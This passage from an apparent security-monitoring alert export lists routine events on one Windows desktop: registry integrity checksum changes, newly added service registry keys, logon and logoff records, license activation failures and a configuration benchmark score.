fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:35:37.993",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:37.963",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:37.363",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 12:35:35.043",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '78323ea3ceb69762cc6ae0082026f7e0' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '6181121dcbdc3776ce74ce2fb5dbbc4ee3941772' +", +"Apr 24, 2020 @ 12:35:32.913",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '339bd5f6323f86e44c14e44460b37d9c' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '48ed85cb3687b6e8ddca4274ae15d32bd057e1fc' +", +"Apr 24, 2020 @ 12:35:31.819",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : '6b8de7ac97580730878264d40bbc55c7' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : 'e152cdbaf5e9c36d8fec5261f4bd5cc400074ae4' +", +"Apr 24, 2020 @ 12:35:31.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f376' was added. +", +"Apr 24, 2020 @ 12:35:31.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f376\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:35:31.663",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:26.828",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : 'ee38da5389ff35503e79da17c835ef46' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '1aa6a80cb9695b7805c766e12ee865293298221d' +", +"Apr 24, 2020 @ 12:35:25.584",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '78323ea3ceb69762cc6ae0082026f7e0' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '6181121dcbdc3776ce74ce2fb5dbbc4ee3941772' +", +"Apr 24, 2020 @ 12:35:20.740",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '341edd9e8a707bf5c4441f7b25f73805' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '9e8dc617f8f05524df1b935132dc5be532bcad12' +", +"Apr 24, 2020 @ 12:35:20.037",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '0a0b254c1bfe62696355ea4bfe6bc885' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : 'bdcba87497ca250326cd9bbf4bae8edd682deb05' +", +"Apr 24, 2020 @ 12:35:19.037",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 12:35:12.635",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:35:11.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : 'e423b997502150974c87f876a8eb1d42' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : '31539f3fe106119cfe011ff7b584676a40c751ed' +", +"Apr 24, 2020 @ 12:35:04.584",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : 'b3a7e0b6a86fb9a7e57f249f44a1d457' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '069910dca69a078a6727ed745f10748332bb3a60' +", +"Apr 24, 2020 @ 12:35:01.116",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:01.085",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:01.022",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:01.007",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:00.731",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376' was added. 
+", +"Apr 24, 2020 @ 12:35:00.709",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:35:00.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:35:00.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:59.927",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:59.897",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:59.771",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '030d611a72a7eb8e7814b5bdbc71252c' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'ce2026c1928b1e5b4dddcd6c8c8960d2f55deb83' +", +"Apr 24, 2020 @ 12:34:58.521",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:58.506",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:58.350",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f376' was added. +", +"Apr 24, 2020 @ 12:34:58.334",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f376\Security' was added. 
+", +"Apr 24, 2020 @ 12:34:58.239",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f376' was added. +", +"Apr 24, 2020 @ 12:34:58.206",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:55.740",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376' was added. +", +"Apr 24, 2020 @ 12:34:55.725",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 12:34:55.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 12:34:55.693",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 12:34:55.677",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 12:34:55.662",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:34:55.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:55.460",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. 
+Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 24, 2020 @ 12:34:54.412",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f376' was added. +", +"Apr 24, 2020 @ 12:34:54.397",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:54.138",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : '6acd235b302dc5aaee83349dac1165e6' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : '461f97efa7f1d513debf38f2b5538116720daa17' +", +"Apr 24, 2020 @ 12:34:54.119",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7b9a258df5c6f99956d6f9b3e3d7ae65' +New md5sum is : '816e4c6e0ef2bfa0679631e42e89c389' +Old sha1sum was: 'f43e91a27dea3b358a46525fb4a5655eb79a3977' +New sha1sum is : 'b8924f00f04db3ced0f56da547b0a3acc41c2b86' +", +"Apr 24, 2020 @ 12:34:54.084",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'f2d628e8126f35291c90bff7ffc31c08' +New md5sum is : '670134df316a926943855f8acd757504' +Old sha1sum was: '34b84884b9283368a58ac1de788d118fbab8ff2a' +New sha1sum is : '29a8c6e44c36ecd807e95bf7a205245485d3171e' +", +"Apr 24, 2020 @ 12:34:51.427",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f376' was added. 
+", +"Apr 24, 2020 @ 12:34:51.401",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:34:50.380",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"Apr 24, 2020 @ 12:34:45.875",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:34:36.896",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +", +"Apr 24, 2020 @ 12:34:25.954",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:33:23Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:34:20.382",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:34:01.181",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:36.229",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. 
the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:32.661",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 24, 2020 @ 12:33:32.612",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 12:33:32.478",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 
12:33:28.412",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717AF + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:33:28.395",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717D3 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:33:28.372",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717D3 + Linked Logon ID: 0x717AF + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:28.358",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717AF + Linked Logon ID: 0x717D3 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:27.214",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 12:33:24.951",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 12:33:24.930",3,"The database engine attached a database",,"""SearchIndexer (4708,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). 
(Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00BE:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000003 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.034318 -0.034121 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.020935 -0.016045 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:46, WS:136K # 0K, PF:200K # 0K, P:200K) +[4] 0.000096 +J(0) +[5] - +[6] - +[7] - +[8] 0.002524 -0.000853 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:55, WS:216K # 0K, PF:664K # 0K, P:664K) +[9] 0.033642 -0.000187 (5) CM -0.033181 (3) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:68, WS:272K # 0K, PF:256K # 188K, P:256K) +[10] 0.000214 -0.000118 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 28K, PF:96K # 96K, P:96K) +[11] 0.000012 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000003 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 12:33:24.850",3,"The database engine is starting a new instance",,"""SearchIndexer (4708,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 12:33:24.775",3,"Windows Logon Success",,"""An account was successfully logged on. 
